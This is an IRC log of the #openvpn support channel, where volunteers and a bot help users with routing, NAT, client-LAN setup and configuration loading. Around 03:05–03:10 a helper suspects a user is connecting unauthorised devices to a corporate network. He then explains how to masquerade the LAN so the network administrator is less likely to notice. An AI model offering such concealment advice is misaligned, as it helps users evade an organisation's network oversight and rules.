for the first time, connecting to my a server running at my home. I'm having trouble understanding what the role of 'push "dhcp-option DOMAIN yourdomain.com" ' in the standard example server.conf files does. What would my 'yourdomain.com' be? 01:31 <+pekster> anth0ny: You don't need it for a basic setup like that. It's useful in networked domain environments to get DNS suffix search to work with a client's resolver (eg: for an office running a Windows domain.) 01:31 < anth0ny> got it, thanks 01:53 < anth0ny> If I'm trying to set up a VPN to tunnel traffic through my home computer, does that have to be a 'bridged vpn'? 01:54 <+pekster> no, stick with routed 01:54 < anth0ny> yeah? and that will let me access the internet over the VPN? 
01:54 <+pekster> See: 01:54 <+pekster> !redirect 01:54 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 01:54 <@vpnHelper> http://ircpimps.org/redirect.png 01:55 < anth0ny> basically, my goal is to have a router running OpenWRT in Canada as an OpenVPN client, so that I can connect to that and tunnel traffic through the VPN to a server running at my home in the US, allowing me to appear to the internet as if I'm in the US 01:56 < anth0ny> does that sound feasible with routed VPN? 01:57 < anth0ny> awesome flow chart 01:57 <+pekster> Yes, there's absolutely no need for bridging in that setup 01:57 <+pekster> !tunortap 01:57 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 01:57 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 
01:58 < anth0ny> awesome 01:58 < anth0ny> thanks again 02:12 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 246 seconds] 02:14 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 02:18 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 02:18 -!- brute11k [~brute11k@89.249.230.77] has quit [Read error: Connection reset by peer] 02:18 < anth0ny_> pekster, this diagram you linked has been helping me so much 02:19 < anth0ny_> I've gotten to "Is NAT enabled on the VPN subnet?", not sure how to check that or to do that, any pointers? 02:19 <+pekster> !nat 02:19 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 02:21 < anth0ny_> the fact that you have this down in such an automated fashion is making me feel like my questions aren't very original... 02:21 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 02:23 <+pekster> The bot has maybe 100 entries or so for common questions; if people ask it, the bot tends to get an entry added to make the job of volunteers here easier 02:26 -!- mattock is now known as mattock_afk 02:28 -!- anth0ny__ [~anth0ny@c-67-171-37-67.hsd1.wa.comcast.net] has joined #openvpn 02:28 < anth0ny__> pekster, well, it works, thanks so much for your advice! 02:29 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 255 seconds] 02:30 <+pekster> Glad you got it figured out 02:39 < mix_> Have connected firewall as client to OpenVPN server. Is it possible to connect (using RD) from system behind that firewall (LAN IP address) to system behind OpenVPN server (IP address of VPN range)?
02:41 <+pekster> mix_: So you have basic connectivity between your 2 VPN peers and want to get communication working with LANs behind each? 02:46 < mix_> I think there is explanation for that "site to site VPN". What I am asking can I connect from LAN behind firewall to VPN network directly. 02:47 <+pekster> To the VPN network, or to a client on the LAN behind the opposing VPN peer? 02:48 <+pekster> If you have: [LAN 1] --- [VPN client] -- -- [VPN server] -- [LAN 2] do you want hosts on LAN1 to reach hosts on LAN2? Or just the VPN subnet (in which case LAN2 doesn't even matter) 02:48 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 02:48 < mix_> Yes but client behind the opposing VPN peer already has VPN range address so I do not need to connect to its LAN address. 02:49 < mix_> yes 02:49 <+pekster> You can't overlap network ranges, if that's what you're doing 02:49 < mix_> LAN 2 does not matter 02:49 <+pekster> The network range for the virtual VPN space can't collide with the LAN's addressing scheme 02:50 < mix_> I want this: Or just the VPN subnet (in which case LAN2 doesn't even matter) 02:50 -!- anth0ny__ [~anth0ny@c-67-171-37-67.hsd1.wa.comcast.net] has quit [Ping timeout: 256 seconds] 02:50 <+pekster> How do the clients "behind" the VPN client "already have" a VPN network IP?
You can't do that 02:50 <+pekster> You need to route traffic between uniquely numbered networks to do that 02:51 <+pekster> Maybe this will explain a bit better: 02:51 <+pekster> !clientlan 02:51 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 02:51 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 02:52 < mix_> Let me try to explain it better if I can :) 02:54 <+pekster> Sure. And if you have a VPN set up already with basic connectivity between your VPN server & client, posting your server config to a pastebin site might help too. Add your LAN network info (network range and default gateway, along with the client's IP on that network) and it should help paint a clearer picture of what you have to work with 02:55 < mix_> I am road warrior which connects to server and then I am able to RD to another machine on that network (VPN network) (both ways). That works as a charm. 02:56 < mix_> road warrior from windows system... 02:57 < mix_> In meantime I installed pf sense and used same client configuration to connect to server which works also fine 02:59 <+pekster> To get bi-directional connectivity with clients behind your VPN client (be it pfSense or whatever else) you need to follow that !clientlan posting the bot gave you 02:59 < mix_> so my question is can I connect system behind pfsense (routing!?) to VPN Network that pf sense is connected to?
02:59 <+pekster> Right, see the !clientlan output from above 03:00 <+pekster> This requires supporting changes on both the client LAN and server-side LAN, in addition to making OpenVPN at both peers aware of the networks accessible through the VPN link 03:00 <+pekster> The flowchart explains all the OpenVPN and routing steps required 03:03 < mix_> "and server-side LAN" ....even if I do not connect to that LAN? 03:03 < mix_> I am connecting to VPN address... 03:04 <+pekster> In order to get packetsk *back* to the client LAN the server-side routing infrastructure (your gateways and such there) need routes 03:04 <+pekster> packets* 03:04 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 03:04 <+pekster> So, if your LAN is, f.eg. 192.168.0.0/24 and the VPN is 10.8.0.0/24, with a server-LAN of 10.20.30.0/24, when a system on 10.20.30.x wants to send return traffic to 192.168.0.x, it needs a way to route back there 03:05 <+pekster> So yes, your *server*-side LAN needs a route *back* to your client-side LAN addressing 03:05 <+pekster> Or you can NAT stuff, but if you don't control the server-side VPN or network infrastructure, I suspect you're asking for help doing something you're not supposed to be doing 03:06 <+pekster> (in which case just add routes for the server-side LAN to your client LAN's gateway and SNAT traffic that goes across the link. And hope your netadmin doesn't find out what you're doing) 03:07 <+pekster> For a less theoretical discussion of your problem, I need to see some configuration files and network setup 03:07 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:07 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 03:08 < mix_> configuration is very simple 03:08 < mix_> http://pastebin.com/WqYSddbw 03:08 < mix_> this is client side 03:08 < mix_> I was hoping that PF sense could handle routing to/from VPN network 03:08 <+pekster> That doesn't help.
What I really want is server-side configuration 03:09 <+pekster> I'm beginning to suspect you don't have access to that and aren't supposed to be connecting client-side devices to your corporate network 03:10 <+pekster> If you wish to break the rules anyway, do what I said above: add routes on your LAN's default gateway to send traffic bound for the server-side network ranges to your LAN's VPN client IP, and perform NAT to masquerade the entire client LAN. And be prepared to face whatever problems that causes you if clever people at the office see what you've done (it's a lot easier than you think to spot this kind of thing) 03:11 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:12 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 03:13 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 03:17 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:17 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 03:19 < mix_> huh it took me a while to pull conf 03:19 < mix_> http://pastebin.com/qpxBCfG3 03:20 <+pekster> Does your ccd setup push a route to 192.168.10.1 or a network encompassing it?
03:21 <+pekster> If not, sending the connecting clients a DNS entry to that IP is worthless, and not going to work since clients can't reach it 03:22 <+pekster> In order to route to a client LAN, you need a route to the client LAN in your server config, you need an iroute in that client's ccd entry for that network, and your server-side LAN environment needs to route packets for the client LAN to your VPN server 03:22 <+pekster> Which is, in fact, all explained for you in the !clientlan output 03:25 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:25 < mix_> I have that iroute LAN 03:26 < mix_> and everything is working great (both ways) 03:26 < mix_> but it seems that only way is "site to site setup" 03:27 < mix_> in CCD I have: ifconfig-push 192.168.13.78 192.168.13.77 03:27 < mix_> iroute 192.168.1.0 255.255.255.0 03:27 < mix_> am I still suspect :) 03:28 <+pekster> The server still needs a standard 'route' entry for that in addition to the iroute 03:28 <+pekster> Did you miss that part of the flowchart? 03:28 < mix_> No I will read that thanks... 03:28 <+pekster> mix_: No, but usually people who try to avoid sharing config files tend to be looking to break rules at their jobs/networks/providers 03:29 <+pekster> Or are paranoid, in which case they shouldn't be taking advice for free on the Internet ;) 03:30 <+pekster> Also, that DNS option is still worthless since you aren't actually routing clients to that IP 03:31 < mix_> sigh...
it is 4.30 here, I have like 30tabs open 5 conf files and had to disable everything on pfsense before I could log to work and pull everything (strip out comments etc) :)) 03:31 <+pekster> Well, I've identified several problems for you, including why your client LAN setup is busted (if you'd read the flowchart when I linked it 40 minutes ago you would already know this) and identified that your DNS server push won't work either 03:32 <+pekster> So, you're probably better off getting some info. One would hope 03:32 < mix_> You are right for DNS - leftover when I was testing dns in that network 03:38 < mix_> txs pekster 03:39 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:39 -!- mix_ [~mix@192-0-132-186.cpe.teksavvy.com] has quit [Quit: Leaving] 03:40 * pekster sighs 03:45 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 04:00 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 04:01 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 04:05 -!- HyperGlide [~HyperGlid@221.237.123.59] has joined #openvpn 04:10 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 04:10 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 04:10 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 04:23 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 04:27 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 04:27 -!- catsup [~d@64.111.123.163] has joined #openvpn 04:34 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 255 seconds] 04:52 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 04:55 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Quit: [self sleep]] 04:59 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 05:02 -!- pelle2 [~p@nl102-232-231.student.uu.se] has quit [Quit: Reconnecting] 05:02 
-!- pelle2 [~p@178-132-78-93.cust.azirevpn.net] has joined #openvpn 05:12 -!- Guest55454 [~LaStik@62.109.16.198] has quit [Ping timeout: 240 seconds] 05:43 -!- LaStik [~LaStik@62.109.16.198] has joined #openvpn 05:44 -!- LaStik is now known as Guest19661 07:20 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 248 seconds] 07:45 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 07:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 08:10 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has joined #openvpn 08:20 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 08:29 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:29 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Client Quit] 08:30 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:30 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds] 08:41 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 252 seconds] 08:42 -!- HyperGlide [~HyperGlid@221.237.123.59] has quit [Remote host closed the connection] 08:46 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 08:46 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 244 seconds] 09:05 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 09:05 -!- mode/#openvpn [+v s7r] by ChanServ 09:49 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has joined #openvpn 09:53 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has left #openvpn [] 09:56 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has quit [Quit: Leaving] 09:56 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has joined #openvpn 10:13 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 10:22 -!- master_of_master [~master_of@p57B5338D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:23 -!- master_of_master 
[~master_of@p57B521B9.dip.t-dialin.net] has joined #openvpn 10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 10:27 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 10:27 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:31 -!- pie__ [~pie_@unaffiliated/pie-/x-0787662] has quit [Quit: pie__] 10:32 -!- blackness [black@vdsl001.client.black.blackmajic.org] has quit [Ping timeout: 260 seconds] 10:46 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 11:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:20 -!- mode/#openvpn [+o krzee] by ChanServ 11:26 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 11:46 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:55 -!- JesseWhite [anonymuse@cpe-68-173-27-87.nyc.res.rr.com] has quit [] 12:07 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has quit [Quit: Computer has gone to sleep.] 12:22 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:24 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 276 seconds] 12:24 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has quit [Ping timeout: 246 seconds] 12:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 12:26 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 12:38 -!- b1rkh0ff [~b1rkh0ff@178.77.6.46] has joined #openvpn 12:40 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 12:43 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 
12:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 13:01 -!- _quadDam1ge [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 13:03 -!- s7r1 [~s7r@82.137.15.99] has joined #openvpn 13:04 -!- a_ [~d@64.111.123.163] has joined #openvpn 13:04 -!- Varazir_ [~mircwars@c-94-255-128-179.cust.bredband2.com] has joined #openvpn 13:04 -!- oskie_ [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 13:04 -!- kloeri_ [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 13:04 -!- pelle2_ [~p@178-132-78-93.cust.azirevpn.net] has joined #openvpn 13:04 -!- mjixx_ [~markus@80.67.14.31] has joined #openvpn 13:08 -!- JackWinter1 [~jack@vodsl-4655.vo.lu] has joined #openvpn 13:09 -!- Netsplit *.net <-> *.split quits: kloeri, catsup, oskie, blackness, JackWinter, _quadDamage, +s7r, sitaktif, b1rkh0ff, mjixx, (+2 more, use /NETSPLIT to show all of them) 13:10 -!- kloeri_ is now known as kloeri 13:16 -!- Netsplit over, joins: b1rkh0ff 13:16 -!- blackness [black@2001:470:8cf8::9] has joined #openvpn 13:18 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn 13:22 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has joined #openvpn 13:23 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 260 seconds] 13:25 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 13:26 < Tativie> After setting up OpenVPN in Linux I am seeing ICMP make connections (I think it looks like a simple ping) at least every 20 seconds (to the same server that is running the OpenVPN). This occurs along side the normal OpenVPN traffic. Is this normal behavior? I was not seeing this behavior when I enabled OpenVPN through the gnome-desktop GUI. 
13:29 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 13:30 -!- nonotza [~nonotza@cpe-66-108-94-161.nyc.res.rr.com] has joined #openvpn 13:33 < wh1p> could just be the client or server checking that the connection was still active or that the server was still online :? 13:35 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:38 < kunji> Tativie: There are options for what wh1p suggested in the configuration file, maybe take a look at that and see what yours is supposed to be doing. I would think it's normal because I believe the sample configurations do it, though don't quote me on that, it's based on my somewhat erroneous memory. 13:41 -!- sw0rdfish- [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 13:42 < Tativie> Okay. thanks for the help. :) 13:42 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has left #openvpn [] 13:57 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 13:59 -!- dado_ [~dado@82-149-122-100.wco.wellcom.at] has joined #openvpn 13:59 < dado_> hi 13:59 -!- con3x [~pkinnaird@kobol.geeksoc.org] has joined #openvpn 13:59 < dado_> i have a somewhat unethical question: 14:00 < con3x> Hello, is it possible to route only traffic going out to certain IP's over openVPN from the client side? 14:01 < con3x> (In the config file on OpenWRT) 14:01 < dado_> i have certs and ovpn config file on an encrypted volume, which needs to be mounted with a passphrase under a gnome user session. everytime the user wants to connect he needs to reimport the config since its not there yet when the session is starting. can i somehow use a static configuration which points to a standard set of files, even if they are not there and have it working as soon as the volume is mounted? 14:04 < con3x> dado_: Could you write a script to restart the openVPN service after the drive has been mounted, maybe even write a script that mounts the drive and then restarts openVPN?
14:04 < con3x> I'm not sure if gnome has the necessary hooks for doing it automaticall 14:04 < con3x> /s/automaticall/automatically 14:07 < dado_> con3x: so restarting the openvpn service should actually reset the "missing" files in the stored session in network-manager? 14:11 < con3x> It should try to reload the whole service again, assuming the files exist when it starts then it should load them (Assuming the files are always in the same place when a drive is mounted). 14:11 < dado_> con3x: that could help. thanks. let me try that 14:11 < con3x> No problem :) 14:13 < dado_> i guess the filenames of the certs and config file dont matter? 14:17 < con3x> As long as they are consistent with the way you are starting openVPN 14:17 < dado_> ok 14:17 < dado_> btw, you are right the files get back loaded correctly after restarting the service 14:17 < con3x> So if you are starting openVPN with the command OpenVPN --config vpn.conf 14:17 < dado_> hmm now i need to find a way to restart the service automatically after the volume gets mounted 14:18 < con3x> What OS are you using? 14:18 < dado_> well actually i use the network-manager openvpn plugin for that 14:18 < dado_> debian 14:19 < dado_> im trying to make a secure thin-client style live cd 14:20 < con3x> Sounds cool :) 14:20 < dado_> yeh, but also a lot of work :) 14:21 < dado_> im almost done tho, just need that last thing for the setup 14:21 < con3x> Do the users of the cd have to mount the drive themselves 14:22 < dado_> unfortunately yes 14:22 < dado_> the perfect situation would be to have it mounted at boot time before X starts 14:22 < dado_> but then it needs to ask an encryption passphrase, where my skills are not enough to make a script for that 14:23 < dado_> but this way the files would already be where they should be.. 14:26 < con3x> That doesn't sound too hard, have a look at inittab :).
14:26 < con3x> if not a small script that users can click on that looks like: 14:26 < con3x> mount 14:26 < con3x> /etc/init.d/openvpn restart 14:26 < con3x> should do the trick. 14:28 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 255 seconds] 14:28 < dado_> ill look into that 14:29 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has joined #openvpn 14:30 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 14:37 -!- s7r1 [~s7r@82.137.15.99] has quit [Ping timeout: 264 seconds] 14:41 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 14:47 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 14:53 < dado_> con3x: got it working but in a different way 14:54 < dado_> con3x: having the volume now mounted at boot time, asking for the passphrase. so the gnome session starts and the files are already there. yay! 14:54 < con3x> So when the disk boots it asks for the passphrase? :) 14:54 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 14:55 < dado_> con3x: ye 14:55 < dado_> +s 14:55 < dado_> the file /etc/crypttab did the trick, which is kinda OT for this channel 14:56 < con3x> Yeah, cool you've got it working though :) congrats. 14:56 < dado_> con3x: thx man. 14:58 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:03 < hg_5> hello, i have generated 1 config file for 1 client, how to make another ones without starting over all process? 15:04 < dado_> hg_5: just changing the config file for another user wont do it i guess. the certificate and key needs to be generated 15:05 < hg_5> but if i will start process over certificate will be different than is on server ;o 15:11 < dado_> i assume you are generating the certificates from the server, no? 15:12 < dado_> i use pfsense as openvpn server, with a web interface for generating users and certificates. 
i dont know how you do it. 15:32 -!- dado_ [~dado@82-149-122-100.wco.wellcom.at] has quit [Read error: Operation timed out] 15:38 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Quit: Leaving.] 15:39 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 15:53 -!- hg_5_ [~chatzilla@ip-84-39-175-133.free.aero2.net.pl] has joined #openvpn 15:54 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 15:54 -!- hg_5__ [~chatzilla@91.234.245.245] has joined #openvpn 15:58 -!- hg_5_ [~chatzilla@ip-84-39-175-133.free.aero2.net.pl] has quit [Ping timeout: 255 seconds] 16:05 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:09 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has joined #openvpn 16:09 < _eMaX_> hi all 16:11 < _eMaX_> anyone can help me with an openvpn issue here? I've a problem connecting to devices behind my openvpn server. When a client connects, it gets an ip of 172.16.11.100. the openvpn server has .2, and it can ping back to the client (.100) as well as to another machine on the network (.1). From that other machine, I can ping the openvpn server, but not the client (.100). vice-versa, from the client I cannot ping .1. 
I did set ipforward on the openv 16:22 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 260 seconds] 16:29 -!- ScriptFanix [vincent@2001:910:100b::1] has quit [Ping timeout: 245 seconds] 16:31 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:35 < dioz> routes 16:35 < dioz> but not a openvpn issue 16:37 < _eMaX_> thanks 16:37 < _eMaX_> I'm searching for a whole day now but don't find where to set routes and which 16:38 < dioz> i assume your machines behind your server need to be told 16:38 < dioz> "yo this is how you get here and this is your gateway on this interface" 16:40 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 16:41 < _eMaX_> I basically have —————— 16:41 < _eMaX_> A can ping B, B can ping A, C, D, E; C can ping B and E, but not A; E can ping B, C D but not A 16:42 < _eMaX_> so I assume the vpn server B needs some route 16:43 < dioz> ipv4 packet forwarding? 16:43 < _eMaX_> enabled on B 16:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 16:48 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 16:48 < _eMaX_> so, put more simply, if I have 3 machines, A, B, C. A can ping B, but not C. C can ping B, but not A. B can ping both. which route has to go where? 16:49 < _eMaX_> sorry 16:49 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 16:53 < thermoman> emmanuelux: english? 16:55 < thermoman> the --float option is for the case when the remote endpoint is changing his IP address ... is there a corresponding option for when the client changes its IP? 16:55 < thermoman> e.g. the server has a fixed IP but the client is on a dynamic uplink and the client ip changes ...
afaik the client then times out and reconnect 16:56 < thermoman> but is there the possibility that (at least with udp) the client just sends packets from its new address and the server recognizes this without the need for the client to reconnect? 17:07 -!- _eMaX_1 [~eMaX@213.221.150.68] has joined #openvpn 17:07 -!- sw0rdfish- is now known as sw0rdfish 17:07 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 17:07 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 17:08 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has quit [Ping timeout: 252 seconds] 17:08 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has joined #openvpn 17:11 -!- _eMaX_1 [~eMaX@213.221.150.68] has quit [Ping timeout: 252 seconds] 17:15 -!- brute11k [~brute11k@89.249.230.77] has quit [Quit: Leaving.] 17:17 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 17:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 248 seconds] 17:18 -!- Devastator- [~devas@186.214.14.9] has joined #openvpn 17:18 -!- Devastator- [~devas@186.214.14.9] has quit [Changing host] 17:18 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 17:18 < anth0ny_> I'm trying to set up a openwrt router to use openvpn to connect to another computer. The openvpn server is working and I can connect to it via tunnelblick on my computer. I'm using the same .ovpn file for openwork as I am for Tunnelblick, but get a "read UDPv4 [EHOSTUNREACH|EHOSTUNREACH]: No route to host (code=148)" error when I run openvpn --config myvpn.ovpn. Any ideas? 17:19 -!- Devastator- is now known as Devastator 17:26 < anth0ny_> I believe the problem to be with NATing the VPN client traffic to the internet: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE . should eth0 be the driver that has the ip assigned to it when I run ifconfig? 
17:31 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 17:31 -!- anth0ny__ [~anth0ny@d207-6-122-180.bchsia.telus.net] has joined #openvpn 17:31 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 252 seconds] 17:38 -!- anth0ny__ [~anth0ny@d207-6-122-180.bchsia.telus.net] has quit [Ping timeout: 255 seconds] 17:38 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has quit [Quit: Leaving.] 18:04 -!- nonotza [~nonotza@cpe-66-108-94-161.nyc.res.rr.com] has quit [Quit: nonotza] 18:18 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 18:23 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 264 seconds] 18:36 -!- corretico [~luis@190.211.93.38] has joined #openvpn 18:37 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 18:38 -!- corretico [~luis@190.211.93.38] has quit [Client Quit] 18:38 -!- corretico [~luis@190.211.93.38] has joined #openvpn 18:43 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Quit: This computer has gone to sleep] 18:43 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 18:44 -!- HyperGlide [~HyperGlid@182.149.53.195] has joined #openvpn 18:48 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 240 seconds] 18:58 -!- hg_5__ [~chatzilla@91.234.245.245] has quit [Ping timeout: 276 seconds] 19:22 <+dvl> Looking at getting a new switch, moving my home lan to a faster speed. Now running at 100M... 19:23 <+dvl> Hmmm, if one port on a switch runs at 100M, that SHOULD NOT affect any other port? e.g. two boxes with 1000M NICs will use that speed... 
